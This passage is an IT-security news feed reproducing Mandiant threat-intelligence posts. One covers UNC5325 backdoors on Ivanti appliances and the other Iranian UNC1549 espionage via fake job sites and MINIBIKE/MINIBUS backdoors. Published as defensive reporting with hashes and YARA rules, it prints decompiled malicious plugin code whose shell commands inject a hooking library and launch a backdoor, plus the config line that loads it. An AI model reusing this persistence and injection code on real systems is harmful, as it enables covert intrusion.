/memorysCounter -p %d /data/runtime/cockpit/mem.rd", new Object[] 
{ Integer.valueOf(procnum) });
          Process process1 = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", processinjectstr });
        } 
      } 
      Process processps = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", "ps aux|grep '/data/runtime/cockpit/dsAgent'|grep 
-v grep | awk '{print $2}'" });
      BufferedReader readerps = new BufferedReader(new 
InputStreamReader(processps.getInputStream()));
      if ((line = readerps.readLine()) == null) {
        Process processinjectres = Runtime.getRuntime().exec("rm 
-f /data/runtime/cockpit/wd.lock");
        ProcessBuilder processBuilder1 = (new ProcessBuilder(new 
String[] { "/data/runtime/cockpit/dsAgent" })).redirectErrorStream(true);
        Process process1 = processBuilder1.start();
      } 
    } catch (Exception exception) {}
  }
  
  public HandshakeInterface getHandshakePlugin() {
    long timeInterval = 10000L;
    Runnable runnable = new Runnable() {
        public void run() {
          while (true) {
            SparkPlugin.watchdog();
            try {
              Thread.sleep(10000L);
            } catch (InterruptedException e) {
              e.printStackTrace();
            } 
          } 
        }
      };
    Thread thread = new Thread(runnable);
    thread.start();
    return null;
  }</code></pre>
<p><span><em><span>Figure 19: Excerpt of security.jar plugin</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>The SparkGateway configuration is modified to load the plugin. Figure 20 shows the relevant excerpt from <code>gateway.conf</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>plugin = SparkPlugin
pluginFile = /data/runtime/cockpit/security.jar</code></pre>
<p><span><em><span>Figure 20: Excerpt of SparkGateway configuration file</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>The <code>security.jar</code> plugin is executed during the negotiation of an RDP connection when the system invokes the Handshake plugin. The <code>getHandshakePlugin()</code> method creates a new thread from a Runnable interface that repeatedly calls <code>SparkPlugin.watchdog()</code> every ten (10) seconds. This acts as a persistence method to ensure the continuous execution of the malicious <code>watchdog</code> method without interfering with the primary operation of the SparkGateway application.</p>
<p>The <code>watchdog</code> method first checks if the shared object <code>mem.rd</code> (PITHOOK) is mapped within the <code>web</code> process memory. If not, it injects <code>mem.rd</code> into the <code>web</code> process.</p>
<p>Figure 21 shows the command executed to inject PITHOOK (<code>mem.rd</code>) into the web process, where <code>%d</code> represents the process ID (PID) of the <code>web</code> process.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd</code></pre>
<p><span><em><span>Figure 21: Command to inject PITHOOK</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>We determined that <code>/data/runtime/cockpit/memorysCounter</code> is a direct instance of <a href="https://github.com/kubo/injector" rel="noopener" target="_blank"><u>Kubo Injector</u></a> without any additional modifications or changes. Kubo Injector is based on the popular <a href="https://github.com/gaffe23/linux-inject" rel="noopener" target="_blank"><u>linux-inject</u></a> project, a utility that can inject a shared object into an arbitrary process given a process name or process ID.</p>
<p><span>PITHOOK hooks the </span><code>accept</code><span> and </span><code>accept4</code><span> functions within the </span><code>web</code><span> process by modifying the PLT. When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward </span><span>it to PITSTOP over the</span><span> Unix domain socket </span><code>/data/runtime/cockpit/wd.fd</code><span>.</span></p>
<p>Lastly, the <code>watchdog</code> method will execute the PITSTOP backdoor (<code>/data/runtime/cockpit/dsAgent</code>) if it is not already running.</p>
<p>PITSTOP creates and listens on the Unix domain socket located at <code>/data/runtime/cockpit/wd.fd</code>. It waits to receive a socket forwarded by PITHOOK after receiving the predefined magic byte sequence. Then PITSTOP duplicates the socket for further communication over TLS. When the TLS connection is established, PITSTOP uses Base64 and a hard-coded AES key to evaluate the incoming command. It supports shell command execution, file write, and file read on the compromised appliance.</p>
<h2>Outlook and Implications</h2>
<p>UNC5325’s TTPs and malware deployment showcase the capabilities that <a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-espionage-tactics" rel="noopener" target="_blank"><u>suspected China-nexus espionage actors</u></a> have continued to leverage against edge infrastructure in conjunction with zero days. Similar to <a href="https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation" rel="noopener" target="_blank"><u>UNC4841</u></a>’s familiarity with Barracuda ESGs, UNC5325 demonstrates significant knowledge of the Ivanti Connect Secure appliance as seen in both the malware they used and the attempts to persist across factory resets. Mandiant expects UNC5325 as well as other China-nexus espionage actors to continue to leverage zero day vulnerabilities on network edge devices as well as <a href="https://cloud.google.com/blog/topics/threat-intelligence/fortinet-malware-ecosystem" rel="noopener" target="_blank"><u>appliance-specific malware </u></a>to gain and maintain access to target environments.</p>
<h6><em>The material in this blog post is being shared as cyber threat indicators and defensive measures solely for cybersecurity purposes in accordance with the Cybersecurity Information Sharing Act of 2015 (“CISA/2015”).  This information is subject to the provisions of CISA/2015, including 6 U.S. Code § 1504(d)(1).</em></h6></div>
<div class="block-paragraph_advanced"><h2><span>Indicators of Compromise (IOCs)</span></h2>
<h3><span>Host-Based Indicators (HBIs)</span></h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Filename</strong></p>
</th>
<th scope="col">
<p><strong>MD5</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>DSUserAgentCap.pm</code></p>
</td>
<td>
<p><span>e4fe3a314a3aee5aee9c55787a33671c</span></p>
</td>
<td>
<p><span>BUSHWALK activator / deactivator</span></p>
</td>
</tr>
<tr>
<td>
<p><code>querymanifest.cgi</code></p>
</td>
<td>
<p><span>e48716521dc48425feae71bc9dc768cd</span></p>
</td>
<td>
<p><span>BUSHWALK variant</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskCounters</code></p>
</td>
<td>
<p><span>8c4b32e8ee9e0b2f8dab01364971ffff</span></p>
</td>
<td>
<p><span>Dropper for DSUserAgentCap.pm</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskmonitor</code></p>
</td>
<td>
<p><span>e33a3a90f1f8fa6d8f17bc6151b027d6</span></p>
</td>
<td>
<p><span>Encrypted DSUserAgentCap.pm</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskAnalysis</code></p>
</td>
<td>
<p><span>6c58b8b1e3b36a5a124afd110c109ebc</span></p>
</td>
<td>
<p><span>Encrypted BUSHWALK variant</span></p>
</td>
</tr>
<tr>
<td>
<p><code>plugin.jar</code></p>
</td>
<td>
<p><span>b76d7890a7a7ff6d0b1151a8251e318f</span></p>
</td>
<td>
<p><span>PITFUEL SparkGateway plugin</span></p>
</td>
</tr>
<tr>
<td>
<p><code>gateway.conf</code></p>
</td>
<td>
<p><span>9e0941c4851d414b5d25dd15872c3e47</span></p>
</td>
<td>
<p><span>SparkGateway config to load PITFUEL</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libchilkat.so</code></p>
</td>
<td>
<p><span>fd83b3e9db57838b62c5baf8218ce5a8</span></p>
</td>
<td>
<p><span>LITTLELAMB.WOOLTEA backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libaprhelper.so</code></p>
</td>
<td>
<p><span>2ddeca6511506fe435dc1f63b4cf061c</span></p>
</td>
<td>
<p><span>PITSOCK backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>security.jar</code></p>
</td>
<td>
<p><span>f64a799ff16aded3f4d6706ffbd7e6dd</span></p>
</td>
<td>
<p><span>PITDOG SparkGateway plugin</span></p>
</td>
</tr>
<tr>
<td>
<p><code>gateway.conf</code></p>
</td>
<td>
<p><span>fb973c8bbfdba234ea83ee20084dcac9</span></p>
</td>
<td>
<p><span>SparkGateway config to load PITDOG</span></p>
</td>
</tr>
<tr>
<td>
<p><code>mem.rd</code></p>
</td>
<td>
<p><span>5368b1122c10fa7850f44d3e16fc18fb</span></p>
</td>
<td>
<p><span>PITHOOK backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>memorysCounter</code></p>
</td>
<td>
<p><span>31a591a28198f05e9ab4d12609a9ce81</span></p>
</td>
<td>
<p><span>Kubo Injector</span></p>
</td>
</tr>
<tr>
<td>
<p><code>dsAgent</code></p>
</td>
<td>
<p><span>5f561f217a8046de8cadf418ef4dfda0</span></p>
</td>
<td>
<p><span>PITSTOP backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wd.fd</code></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>Unix domain socket for PITSTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wd.lock</code></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>Mutex for PITSTOP</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em><span>Table 3: Host-based indicators</span></em></span></p>
<h2><span>YARA Rules</span></h2>
</div></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_PITDOG_1 {
  meta:
    author = "Mandiant"
    description = "This rule is designed to detect on events 
related to PITDOG."
	strings:
		$str2 = "cat /proc/%d/maps | grep mem.rd"
		$str3 = "/data/runtime/cockpit/memorysCounter 
-p %d /data/runtime/cockpit/mem.rd"
		$str4 = "rm -f /data/runtime/cockpit/wd.lock"
		$str5 = "/data/runtime/cockpit/dsAgent"
		$str6 = "watchdog"
		$str7 = "ps aux|grep '/home/bin/web'|grep -v grep 
| awk '{if (NR!=1) {print $2}}'"
condition:
	uint32(0) == 0xBEBAFECA and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Utility_PITHOOK_1 {
  meta:
    author = " Mandiant"
    description = "This rule is designed to detect on events 
related to PITHOOK."
	strings:
		$str1 = "/data/runtime/cockpit/wd.fd"
		$str2 = "/proc/self/maps"
		$str3 = "plthook_open"
		$str4 = "plthook_replace"
		$str5 = "plthook_close"
		$str6 = "plthook_open_by_handle"
		$str7 = "plthook_open_by_address"
		$str8 = "plthook_enum"
		$str9 = "plthook_error"
		$str10 = "accept4_hook"
	condition:
		uint32(0) == 0x464C457F and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Webshell_BUSHWALK_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects BUSHWALK, a webshell 
written in Perl CGI that is embedded into a legitimate 
Pulse Secure file to enable file transfers"
  strings:
    $s1 = "SafariiOS" ascii
    $s2 = "command" ascii
    $s3 = "change" ascii
    $s4 = "update" ascii
    $s5 = "$data = RC4($key, $data);" ascii
  condition:
    filesize &lt; 5KB
    and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Launcher_PITFUEL_1 {
    meta:
		author = "Mandiant"
		description = "This rule detects class used in 
PITFUEL, a malicious JAR-based launcher that loads malicious code"
	strings:
		$h1 = {50 4B 03 04}
		$s1 = "com/toremote/gateway/plugin/PluginManager.class"
	condition:
		$h1 at 0 and for any i in (0..#h1): ($s1 in (@h1[i]..@h1[i]+80))
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-935</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2023-46805, Authentication Bypass, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-934</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21887, Command Injection, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-936</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21887, Command Injection, Variant #2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-986</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21893, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-055</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-22024, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-060</span></p>
</td>
<td>
<p><span>Malicious File Transfer - BUSHWALK, Download, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[When Cats Fly: Suspected Iranian Threat Actor UNC1549 Targets Israeli and Middle East Aerospace and Defense Sectors]]></title>
<description><![CDATA[Written by: Ofir Rozmann, Chen Evgi, Jonathan Leathery

 
Today Mandiant is releasing a blog post about suspected Iran-nexus espionage activity targeting the aerospace, aviation and defense industries in Middle East countries, including Israel and the United Arab Emirates (UAE) and potentially Tu...]]></description>
<link>https://tsecurity.de/de/3578876/it-security-nachrichten/when-cats-fly-suspected-iranian-threat-actor-unc1549-targets-israeli-and-middle-east-aerospace-and-defense-sectors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578876/it-security-nachrichten/when-cats-fly-suspected-iranian-threat-actor-unc1549-targets-israeli-and-middle-east-aerospace-and-defense-sectors/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Ofir Rozmann, Chen Evgi, Jonathan Leathery</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>Today Mandiant is releasing a blog post about <strong>suspected Iran-nexus espionage activity targeting the aerospace, aviation and defense industries in Middle East</strong> countries, including Israel and the United Arab Emirates (UAE) and potentially Turkey, India, and Albania. </p>
<p><strong>Mandiant attributes this activity with moderate confidence to the Iranian actor UNC1549</strong>, which overlaps with <strong>Tortoiseshell</strong>—a threat actor that has been publicly <a href="https://www.wired.com/story/facebook-iran-espionage-catfishing-us-military/" rel="noopener" target="_blank"><u>linked</u></a> to <strong>Iran’s Islamic Revolutionary Guard Corps (IRGC)</strong>. Tortoiseshell has previously attempted to compromise supply chains by targeting defense contractors and IT providers.  </p>
<p>The<strong> potential link between this activity and the Iranian IRGC</strong> is noteworthy given the focus on defense-related entities and the recent tensions with Iran in light of the Israel-Hamas war. Notably, Mandiant observed an<strong> Israel-Hamas war-themed campaign that masquerades as the “Bring Them Home Now” movement</strong>, which calls for the return of the Israelis kidnapped and held hostage by Hamas.</p>
<p>This suspected UNC1549 activity has been active since at least June 2022 and is still ongoing as of February 2024. While regional in nature and focused mostly in the Middle East, the targeting includes entities operating worldwide.</p>
<p>Mandiant observed this campaign<strong> </strong>deploy<strong> multiple evasion techniques</strong> to mask their activity, most prominently the <strong>extensive use of Microsoft Azure cloud infrastructure</strong> as well as <strong>social engineering schemes to disseminate two unique backdoors: MINIBIKE and MINIBUS</strong>.</p>
<p>This blog post details the suspected UNC1549 operations since June 2022, the ongoing development of their proprietary malware, their network of over 125 Azure command-and-control (C2) subdomains, and their attack lifecycle, which includes tactics, techniques, and procedures (TTPs) Mandiant has not previously seen deployed by Iran.</p>
<h2>Attribution</h2>
<p>Mandiant assesses with moderate confidence that this activity has ties to UNC1549, an Iran-based espionage group, which overlaps with activities publicly known as <a href="https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf" rel="noopener" target="_blank"><u>Tortoiseshell</u></a> and <a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide" rel="noopener" target="_blank"><u>Smoke Sandstorm/BOHRIUM</u></a>. </p>
<p>Namely, a fake recruiting website (1stemployer[.]com) was observed hosting a MINIBUS payload in November 2023. The template used for the fake recruiting website had been used previously in another fake recruiting website, careers-finder[.]com, which was used by UNC1549. </p>
<ul>
<li>
<p>In this campaign, the MINIBUS backdoor was hosted on a fake job website (1stemployer[.]com) using the exact same written contents as careers-finder[.]com used by UNC1549 in early 2022, for example, “After considering the career and education background we introduce you to the employer companies which are looking for the indicated skills and expertise.”</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig1.max-1000x1000.png" alt="Fake job website 1stemployer[.]com deploying a template similar to a previous UNC1549 website">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fzpdl">Figure 1: Fake job website 1stemployer[.]com deploying a template similar to a previous UNC1549 website</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>In addition, like in previous UNC1549 activities, this campaign leveraged .NET applications to deliver the malware—this time the attackers implemented it by using a fake Hamas-affiliated application to deliver the MINIBUS backdoor.</li>
</ul>
<p><strong>According to public </strong><a href="https://www.wired.com/story/facebook-iran-espionage-catfishing-us-military/" rel="noopener" target="_blank"><strong><u>reporting</u></strong></a><strong>, Tortoiseshell, which is tied to UNC1549, is potentially linked to the IRGC</strong>.</p>
<p>In addition, <strong>the focused targeting of Middle East entities</strong> affiliated with the aerospace and defense sectors<strong> is consistent with other Iran-nexus clusters of activity</strong>, some of which are affiliated with the IRGC as well.</p>
<h2>Outlook and Implications</h2>
<p>Mandiant research indicates this campaign remains active as of February 2024, and targeted entities are related to defense, aerospace, and aviation in the Middle East, particularly in Israel and the UAE and potentially in Turkey, India, and Albania. </p>
<p>The intelligence collected on these entities is of relevance to strategic Iranian interests and may be leveraged for espionage as well as kinetic operations. This is further supported by the potential ties between UNC1549 and the IRGC.</p>
<p>The evasion methods deployed in this campaign, namely the tailored job-themed lures combined with the use of cloud infrastructure for C2, may make it challenging for network defenders to prevent, detect, and mitigate this activity. The intelligence and indicators provided in this report may support these efforts and enhance them.</p>
<h2>Attack Lifecycle</h2>
<p>This suspected UNC1549 campaign uses two primary methods to achieve initial access to the targets: spear-phishing and credential harvesting. A typical chain of attack consists of several stages:</p>
<ul>
<li>
<p><strong>Spear-phishing </strong>emails or social media correspondence, disseminating links to<strong> fake websites containing Israel-Hamas related content or fake job offers</strong>. The websites would eventually lead to downloading a malicious payload.</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig2.max-1000x1000.png" alt="Fake website posing as the “Bring Them Home Now” movement, calling for the return of Israelis kidnapped by Hamas">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1s7sn">Figure 2: Fake website posing as the “Bring Them Home Now” movement, calling for the return of Israelis kidnapped by Hamas</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>
<ul>
<li>The fake job offers were for <strong>tech and defense-related positions</strong>, specifically in the aviation, aerospace, or thermal imaging sectors. </li>
<li>
<p>Mandiant also observed some of the fake job websites that hosted malicious payloads were also used during 2023 to <strong>harvest credentials</strong>.</p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig3-fig6.max-1000x1000.png" alt="Fake login page masquerading as the aerospace company Boeing">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1s7sn">Figure 3: Fake login page masquerading as the aerospace company Boeing</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><strong>Payload delivery</strong>, downloaded from the previously mentioned websites to the target’s computer. The payload is a compressed archive that typically includes two main bundles:</li>
<li>
<ul>
<li>MINIBIKE or MINIBUS—two unique backdoors deployed at least since 2022 (MINIBIKE) and 2023 (MINIBUS), providing full backdoor functionality (see the Technical Appendix for more information).</li>
<li>
<p>A benign lure in the form of an application like OneDrive (MINIBIKE) or, in the case of MINIBUS, a custom application presenting content related to Israelis kidnapped by Hamas hosted on the fake website birngthemhomenow[.]co[.]il mentioned previously.</p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig4-fig13-blurred.max-1000x1000.png" alt="Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6skve">Figure 4: Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><strong>Payload installation and device compromise</strong>, achieved after the MINIBIKE or MINIBUS backdoors establish C2 communication, in most cases via Microsoft Azure cloud infrastructure. 
<ul>
<li>The access to the device can be leveraged for multiple purposes, including intelligence collection and as a stepping stone for further access into the targeted network.</li>
<li>This stage may be supported by the use of LIGHTRAIL, a unique tunneler used in the campaign (see the following details).</li>
</ul>
</li>
</ul>
<p>This suspected UNC1549 campaign<strong> deployed several evasion techniques to mask their activity</strong>:</p>
<ul>
<li>Abusing Microsoft Azure infrastructure for C2 and hosting, making it difficult to discern the activity from legitimate network traffic. In some cases, servers geolocated in the targeted countries (Israel and the UAE) were used, further masking the activity.</li>
<li>Using domain naming schemes that include strings that would likely seem legitimate to network defenders, like countries, organizations names, languages or descriptions related to the targeted sector. Following are several examples of indicative Azure domains: 
<ul>
<li><strong><u>il</u></strong>engineeringrssfeed[.]azurewebsites[.]net (“IL Engineering RSS Feed”)</li>
<li>hiring<strong><u>arabic</u></strong>region[.]azurewebsites[.]net (“Hiring Arabic Region”)</li>
<li><strong><u>turk</u></strong>airline[.]azurewebsites[.]net (“Turk Airline”)</li>
</ul>
</li>
<li>
<p>Using job-themed lures, offering various IT and tech-related positions, which are likely to be disseminated legitimately. One of these fake job offers is presented in Figure 5.</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig5-fig8.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6skve">Figure 5: Fake job offer on behalf of DJI, a drone manufacturing company (MD5: 4a223bc9c6096ac6bae3e7452ed6a1cd)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Malware Families</h2>
<p>Mandiant observed the following custom malware families used in the suspected UNC1549 activity.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Malware Family</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>First Seen</strong></p>
</td>
<td>
<p><strong>Last Seen</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>MINIBIKE</span></p>
</td>
<td>
<p><span>A custom backdoor written in C++ capable of file exfiltration and upload, command execution, and more. Communicates using Azure cloud infrastructure.</span></p>
</td>
<td>
<p><span>June 2022</span></p>
</td>
<td>
<p><span>October 2023</span></p>
</td>
</tr>
<tr>
<td>
<p><span>MINIBUS</span></p>
</td>
<td>
<p><span>A custom backdoor that provides a more flexible code-execution interface and enhanced reconnaissance features compared to MINIBIKE</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>January 2024</span></p>
</td>
</tr>
<tr>
<td>
<p><span>LIGHTRAIL</span></p>
</td>
<td>
<p><span>A tunneler, likely based on an open-source Socks4a proxy, that communicates using Azure cloud infrastructure</span></p>
</td>
<td>
<p><span>November 2022</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><p>MINIBIKE is a custom malware written in C++, used since at least June 2022. Once MINIBIKE is installed, it provides a full backdoor functionality, including directory and file enumeration, collection of system files and information, uploading files, and running additional processes. </p>
<p>The MINIBIKE platform usually consists of three utilities bundled in an archive, delivered via spear phishing:</p>
<ol>
<li>The MINIBIKE backdoor, usually in the form of a .dll or a .dat file</li>
<li>A launcher, executed via search-order-hijacking (SoH), deploying MINIBIKE and setting its persistence using registry keys</li>
<li>A legitimate/fake executable, used to mask the malicious MINIBIKE deployment. Mandiant observed different MINIBIKE versions use three applications for this purpose: Microsoft SharePoint, Microsoft OneDrive, and a fake Hamas-related .NET application.</li>
</ol>
<p>The MINIBIKE platform has been in use since at least June 2022, gradually being developed to several versions distinct from each other in lures, features, and functionality. While Mandiant did not observe any embedded version numbers, <strong>the</strong> <strong>MINIBIKE instances can be divided to the following versions</strong>.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Ver.</strong></p>
</td>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>Changes (Compared to Earlier Version)</strong></p>
</td>
<td>
<p><strong>Geographies</strong></p>
</td>
<td>
<p><strong>Example MD5</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>1.0</span></p>
</td>
<td>
<p><span>June 2022</span></p>
</td>
<td>
<p><span>- First version</span></p>
<p><span>- C2 server geolocated in Iran (not Azure)</span></p>
<p><span>- Submitted to a public malware repository from Iran</span></p>
<p><span>- Legitimate SharePoint installation as a lure</span></p>
<p><span>- Bundled in an IMG drive (“Screenshot.img”)</span></p>
<p><span>- Export DLL name: “update.dll”</span></p>
</td>
<td>
<p><span>Iran</span></p>
</td>
<td>
<p><span>adef679c6aa6860a<br>a89b775dceb6958b</span></p>
</td>
</tr>
<tr>
<td>
<p><span>1.1</span></p>
</td>
<td>
<p><span>October–November 2022</span></p>
</td>
<td>
<p><span>- </span><strong>First use of Azure subdomains for C2</strong><span> - Three embedded, only one used</span></p>
<p><span>- First use of OneDrive installation as a lure and as a registry key for persistence</span></p>
<p><span>- Export DLL name: “Mini.dll”</span></p>
</td>
<td>
<p><span>UAE, Turkey</span></p>
</td>
<td>
<p><span>409c2ac789015e76<br>f9886f1203a73bc0</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.0</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- Three to five Azure C2 domains used subsequently in a loop</span></p>
<p><span>- </span><strong>Bundled in a ZIP file (“Survey.zip”)</strong></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Additional functionality and commands</span></p>
<p><span>- Export DLL name: “Mini-Junked.dll”</span></p>
</td>
<td>
<p><span>Israel, UAE</span></p>
</td>
<td>
<p><span>691d0143c0642ff7<br>83909f983ccb8ffd</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.1</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- Uses “Image Photo Viewer“ registry key for persistence</span></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Three Azure C2 domains</span></p>
</td>
<td>
<p><span>Israel, India</span></p>
</td>
<td>
<p><span>e3dc8810da71812b<br>860fc59aeadcc350</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.2</span></p>
</td>
<td>
<p><span>August–October 2023</span></p>
</td>
<td>
<p><span>- Four Azure C2 domains</span></p>
<p><span>- Reverts back to OneDrive registry key for persistence</span></p>
<p><span>- Additional functionality and commands</span></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Beacon communication looping over three “files”: index.html, favicon.ico, icon.svg</span></p>
<p><span>- Export DLL name: “Micro.dll”</span></p>
</td>
<td>
<p><span>Israel, UAE</span></p>
</td>
<td>
<p><span>054c67236a86d9ab<br>5ec80e16b884f733</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MINIBUS: A RoBUSt Successor?</h2>
<p>Mandiant observed a second backdoor deployed in this campaign, which bears multiple similarities to MINIBIKE and was therefore named MINIBUS. The MINIBUS platform has been used since at least August 2023, likely during the same time as the latest MINIBIKE versions, though not necessarily to target the same victims. </p>
<p><strong>MINIBUS is a more advanced, updated platform when compared to MINIBIKE</strong>. While similar in functionality and code base, <strong>MINIBUS contains fewer built-in features and a more flexible code-execution and command interface</strong> in addition to more advanced reconnaissance features. </p>
